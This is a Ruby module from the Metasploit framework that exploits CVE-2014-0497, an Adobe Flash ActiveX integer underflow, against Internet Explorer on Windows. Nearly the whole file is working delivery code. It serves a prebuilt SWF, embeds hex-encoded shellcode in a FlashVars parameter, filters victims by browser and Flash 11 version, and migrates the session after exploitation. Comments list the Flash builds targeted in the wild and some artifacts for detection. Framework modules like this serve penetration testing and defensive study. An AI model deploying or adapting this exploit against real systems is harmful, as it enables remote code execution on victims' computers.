GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flash_avm2.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
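# Browser exploit server module for CVE-2014-0497 (Adobe Flash Player ActiveX,
# fixed in 12.0.0.43). The Ruby side is only delivery glue: a pre-built SWF
# ("Vickers.swf") is read from the framework data directory and served to an
# Internet Explorer client together with a small HTML wrapper that passes the
# payload to the SWF as a hex string in a FlashVars parameter.
#
# Observable artifacts of this delivery (useful for detection): an HTML page
# embedding the Flash ActiveX CLSID with a randomly named `.swf` movie, a
# `FlashVars` value of the form `id=<hex>`, and both HTTP responses carrying
# `Pragma: no-cache` (the SWF response with `Content-Type: application/x-shockwave-flash`).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Registers module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player Integer Underflow Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
        before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
        integer underflow in several avm2 instructions, which can be turned into remote code
        execution under the context of the user, as exploited in the wild in February 2014. This
        module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
        SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
        rop chains for several Flash 11 versions, as exploited in the wild.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # vulnerability discovery and exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'     =>
        [
          [ 'CVE', '2014-0497' ],
          [ 'OSVDB', '102849' ],
          [ 'BID', '65327' ],
          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ]
        ],
      'Payload'        =>
        {
          # The payload is handed to the SWF as hex in FlashVars (see
          # #exploit_template); the SWF, not this module, decides how it is used.
          'Space'       => 1024,
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
          'Retries'              => false
        },
      'Platform'       => 'win',
      # Versions targeted in the wild:
      # [*] Windows 8:
      # 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
      # 11,6,602,167, 11,6,602,171 ,11,6,602,180
      # 11,7,700,169, 11,7,700,202, 11,7,700,224
      # [*] Before windows 8:
      # 11,0,1,152,
      # 11,1,102,55, 11,1,102,62, 11,1,102,63
      # 11,2,202,228, 11,2,202,233, 11,2,202,235
      # 11,3,300,257, 11,3,300,273
      # 11,4,402,278
      # 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
      # 11,6,602,168, 11,6,602,171, 11,6,602,180
      # 11,7,700,169, 11,7,700,202
      # 11,8,800,97, 11,8,800,50
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          # Flash Player ActiveX control CLSID; the client must expose LoadMovie on it.
          :activex => [
            {
              clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}',
              method: 'LoadMovie'
            }
          ],
          :os_name => OperatingSystems::Match::WINDOWS,
          :ua_name => Msf::HttpClients::IE,
          # Any 11.x Flash version string is accepted; the per-build selection
          # (see the version list above) happens inside the SWF, not here.
          :flash   => lambda { |ver| ver =~ /^11\./ }
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2014-02-05',
      'DefaultTarget'  => 0))
  end

  # Loads the SWF once before the browser exploit server starts, so every
  # request handled by #on_request_exploit serves the same bytes.
  def exploit
    @swf = create_swf
    super
  end

  # Request handler invoked by BrowserExploitServer for each matching client.
  #
  # A request whose URI ends in `.swf` receives the pre-loaded SWF; any other
  # request receives the HTML wrapper produced by #exploit_template.
  #
  # @param cli         [Object] client connection supplied by the framework
  # @param request     [Object] parsed HTTP request (only #uri is read here)
  # @param target_info [Hash]   profile data collected by the browser exploit server
  # @return [void]
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
      return
    end

    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = browser_profile[tag]
    # Reset the per-client "tried" flag so the follow-up request for the SWF
    # from the same client is still served (original note: "to allow request the swf").
    profile[:tried] = false unless profile.nil?
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Builds the HTML page that embeds the SWF.
  #
  # The movie name is randomized per request and the payload is embedded as a
  # hex string in the `id` FlashVar. The template uses ERB-style `<%= %>` tags;
  # it is returned together with the current binding so that `swf_random` and
  # `shellcode` can be interpolated by the caller (presumably send_exploit_html —
  # confirm against BrowserExploitServer).
  #
  # @param cli         [Object] client connection, forwarded to get_payload
  # @param target_info [Hash]   client profile, forwarded to get_payload
  # @return [Array(String, Binding)] the template text and the binding to render it with
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    shellcode = get_payload(cli, target_info).unpack("H*")[0]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="id=<%=shellcode%>" />
    <param name="Play" value="true" />
    </object>
    </body>
    </html>
    |

    return html_template, binding
  end

  # Reads the pre-built SWF from the framework data directory.
  #
  # Uses File.binread instead of the original open-with-block that assigned
  # the block's result to an outer local; same bytes, same Errno::ENOENT on a
  # missing file, without the redundant assignment.
  #
  # @return [String] raw SWF bytes (binary encoding)
  # @raise [SystemCallError] if the data file cannot be read
  def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
    ::File.binread(path)
  end
end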